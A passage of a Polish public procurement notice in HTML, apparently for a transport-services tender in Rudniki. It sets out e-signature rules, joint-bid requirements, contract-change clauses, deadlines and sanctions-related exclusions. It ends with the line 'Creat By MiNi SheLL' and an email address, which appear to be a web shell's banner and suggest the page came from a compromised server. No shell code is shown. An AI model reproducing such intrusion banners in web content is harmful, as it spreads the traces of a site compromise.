zaufania, będącego podmiotem świadczącym usługi certyfikacyjne – podpis elektroniczny, spełniający wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016r. o Usługach zaufania oraz identyfikacji elektronicznej (t.j. Dz.U. z 2020r., poz. 1173). Kwalifikowany podpis elektroniczny oznacza zaawansowany podpis elektroniczny, który jest składany za pomocą kwalifikowanego urządzenia do składania podpisu elektronicznego i który opiera się na kwalifikowanym certyfikacie podpisu elektronicznego.<br/>25. Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta. Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia <br/>i dokumenty, o których mowa w Rozdziale X SWZ, składa każdy z Wykonawców. Oświadczenia <br/>i dokumenty te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału <br/>w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, jaki zakres rzeczowy wykonania zamówienia realizować zamierają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia zostanie wybrana, Wykonawcy zobowiązani są przedłożyć zamawiającemu przed zawarciem umowy w sprawie niniejszego zamówienia, umowę regulującą swoją współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Oprócz przypadków, o których mowa w art. 455 ust. 1 pkt. 2-4 i ust. 2 ustawy – Prawo zamówień publicznych, na podstawie art. 455 ust. 1 pkt. 1 ustawy – Prawo zamówień publicznych, Zamawiający dopuszcza możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawierania umowy lub w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy,<br/>2)	zmiany sposobu spełnienia świadczenia:<br/>a)	potrzeby wykonania usług zamiennych lub odstąpienia od realizacji części usług, <br/>b)	zwiększenie lub zmniejszenie ilości wozokilometrów ustalonych do realizacji zamówienia w związku z wystąpieniem okoliczności powodujących taką zmianę – potrzebę (w tym prawo opcji) tj. zmiana ilości dni obowiązywania umowy, zmiana trasy i jej długości (wkm), zmiana ilości kursów w danym okresie. <br/>Do rozliczenia usług, o których mowa w lit. a – b będzie stosowana cena jednostkowa wkm wynikająca ze złożonej oferty, określona w § 3 ust. 2 niniejszej umowy. <br/>3)	zmiany wynagrodzenia Wykonawcy, w przypadku zaistnienia jednej z następujących okoliczności: <br/>a)	zmiany stawki podatku od towarów i usług VAT. Stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT, co oznacza, że Zamawiający dopuszcza możliwość zmniejszenia i zwiększenia wynagrodzenia brutto o kwotę równą różnicy wynikającej ze zmienionej stawki podatku - dotyczy to części wynagrodzenia za usługi, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano; <br/>b)	zmiany wysokości minimalnego wynagrodzenia za pracę albo minimalnej stawki godzinowej ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2018 r., poz.2177 z późn. zm.). Wynagrodzenie może ulec zmianie odpowiednio do zmiany wysokości kosztów pracy ponoszonych przez Wykonawcę w związku z realizacją przedmiotowego zamówienia, o ile zmiana kosztów pracy wynika ze zmiany przepisów prawa dot. wysokości minimalnego wynagrodzenia za pracę albo minimalnej stawki godzinowej i ma wpływ na koszt wykonywania zamówienia przez Wykonawcę. <br/>c)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Wynagrodzenie może ulec zmianie odpowiednio do zmiany wysokości kosztów ponoszonych przez Wykonawcę w związku z realizacją przedmiotowego zamówienia, o ile zmiana tych kosztów wynika ze zmiany przepisów prawa dot. zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne i ma wpływ na koszt wykonywania zamówienia przez Wykonawcę. <br/>d)	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych. Wynagrodzenie może ulec zmianie odpowiednio do zmiany wysokości kosztów ponoszonych przez Wykonawcę w związku z realizacją przedmiotowego zamówienia, o ile zmiana tych kosztów wynika ze zmiany przepisów prawa dot. zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych i ma wpływ na koszt wykonywania zamówienia przez Wykonawcę. <br/>4)	Wprowadzenie zmian wynagrodzenia o których mowa ust.1 pkt.3 ppkt b-d możliwe będzie, jeżeli Wykonawca:<br/>a)	udowodni, że zmiana w/w przepisów będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>b)	wykaże, jaką część wynagrodzenia stanowią koszty pracy ponoszone przez Wykonawcę w trakcie realizacji zamówienia oraz jak zmiana przepisów wpłynie na wysokość tych kosztów,<br/><br/>Pełny zakres możliwości zmiany umowy wraz z klauzulą waloryzacyjną znajduje się w rozdziale XXIII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/rudniki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-14 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp, zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz.U. 2022, poz. 835) wyklucza się:<br/><br/>1)	Wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>2)	Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., <br/>o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. Ustawy;<br/>3)	Wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy.<br/>Wykluczenie następuje na okres trwania okoliczności określonych w ust. 1.3. <br/>Wykonawca ma obowiązek aktualizować stosowne oświadczenia w przypadku wszelkich zmian w tym zakresie.

Creat By MiNi SheLL
Email: jattceo@gmail.com